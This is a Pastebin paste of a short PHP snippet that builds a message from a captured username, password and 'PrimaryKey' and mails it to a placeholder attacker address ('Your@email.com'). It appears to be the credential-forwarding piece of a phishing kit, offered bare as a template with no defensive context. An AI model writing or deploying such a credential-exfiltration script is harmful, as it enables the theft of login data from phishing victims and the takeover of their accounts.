Guest User

Untitled

a guest
Jan 19th, 2018
390
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 0.20 KB | None | 0 0
  1.  
  2. $sitename = "site.com";
  3. $subject = $Sub;
  4. $recipient = 'Your@email.com';
  5. $message = "Sitename: $sitename - Username: $un - Password: $pw - PrimaryKey: $pk";
  6. mail($recipient, $subject, $message);
Add Comment
Please, Sign In to add comment